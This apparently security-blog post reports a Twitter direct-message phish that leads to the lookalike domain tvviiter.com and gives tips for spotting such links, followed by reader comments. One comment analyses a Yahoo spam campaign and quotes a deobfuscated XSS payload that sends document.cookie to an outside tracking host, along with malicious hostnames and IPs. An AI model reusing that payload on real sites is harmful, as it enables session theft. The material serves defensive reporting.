It's Phishing Season! In fact, it's ALWAYS Phishing Season!
It's always great to hear from our readers, we just got this note in from Tom on a phish that he recently encountered:
One of my followers on Twitter (whose account was likely hacked or fell victim to this scam) sent me the following DM:
hilarious pic! bit.ly/KIbUqq
That bit.ly URL redirects to:
http://tvviiter.com/log-in/q2/?session_timeout=iajb864?emgzw
That site is clearly impersonating the Twitter.com site, and attempts to trick users into typing in their username and password. As of this writing (May 30, 2012 12:18pm EDT), the site is still available.
The whois record shows it as registered to "XIN NET TECHNOLOGY CORPORATION" in Shanghai, China. The whois record also have an HTML "script" tag in it, which may be an attempt to XSS users using web-based WHOIS services (though I did not try loading the JS file to find out).
While I've certainly seen reply spam on Twitter, I don't recall ever seeing this type of DM spam leading to phishing before. I thought that you guys might find it interesting!
I sent a message using Twitter's online support form, and I also submitted the URL to Google's SafeBrowsing list.
This was just too good an example to pass up writing about. Things to watch out for:
- Any link you're asked to click on, in any context is a risk - READ THE UNDERLYING LINK to verify that you're going where you think you are.
- If it's a shortened link (bit.ly or whatever), check it with a sacrificial VM or from a sandboxed browser that you trust is actually partiitioned and "safe"
- Before you click the link - READ THE LINK AGAIN - the "vv" instead of a "w" character in twitter is a nice touch, easy to miss
- Finally, before clicking the link, DON'T CLICK THE LINK. Cut and paste it into your browser rather than clicking it directly.
If you've got any other pointers, or if I've missed anything, please use our comment to .. well... comment !
===============
Rob VandenBrink
Metafore
Comments
AndrewB
May 30th 2012
1 decade ago
Elliot
May 30th 2012
1 decade ago
http://www.getlinkinfo.com/
http://longurl.org/
bartblaze
May 30th 2012
1 decade ago
For example, Yahoo users were/are targeted as follows: they receive a mail from someone they know asking them to click on a link such as hxxp://www.news15jo.net/biz/ (other hostnames include www.news15de.net and www.inews15ny.net, many more will probably exist, each of them currently resolving to 190.123.43.180, 77.79.14.249, 77.79.13.19, 193.107.19.215, 190.123.43.85, 193.107.19.185, 190.123.43.85, 50.7.246.171). My source (in Dutch): http://www.security.nl/artikel/41676/1/Gevaarlijke_site_als_url_in_de_mail.html
hxxp://www.news15jo.net/biz/ looks like a news site, however "get rich quick" is all over the place. For anyone who trusts these guys:
"How A single Mom from [location obtained from http://j.maxmind.com/app/geoip.js] unlocked a gold mine and is turning huge profits from home."
Just Google for (including the double quotes): "How A single Mom from" "unlocked a gold mine and is turning huge profits from home."
In between de calls to various websites the following is interesting (simplified by me):
GET /forumCreation/createNewForum?p=aaaa [followed by obfuscated stuff including, deobfuscated: onmousemove="document.location.href='http://trackuk.net/ru/tracking.php?ex='.concat(escape(document.cookie)) ]
Host: kr.kpost.yahoo.com
Referer: http://www.news15jo.net/biz/toto.php
I've not fully investigated this (didn't see any drive-by malware, but some netizens report otherwise). However I assume that if you're still logged on to Yahoo and you click the link, a thread on the KPost (Korea) forum is created by _you_ followed by some magic that causes you to spam everyone in your Yahoo addresslist.
PS1 NoScript in Firefox cries XSS.
PS2 Google for "/forumCreation/createNewForum?p=aaaa" (including the double qoutes) results in a lot of recent urlquery.net hits.
PS3 Apparently this has been going on for some time now, see http://www.workathometruth.com/herman-cain-email-spam-used-by-scammers-to-push-home-business-scams/
Bitwiper
May 30th 2012
1 decade ago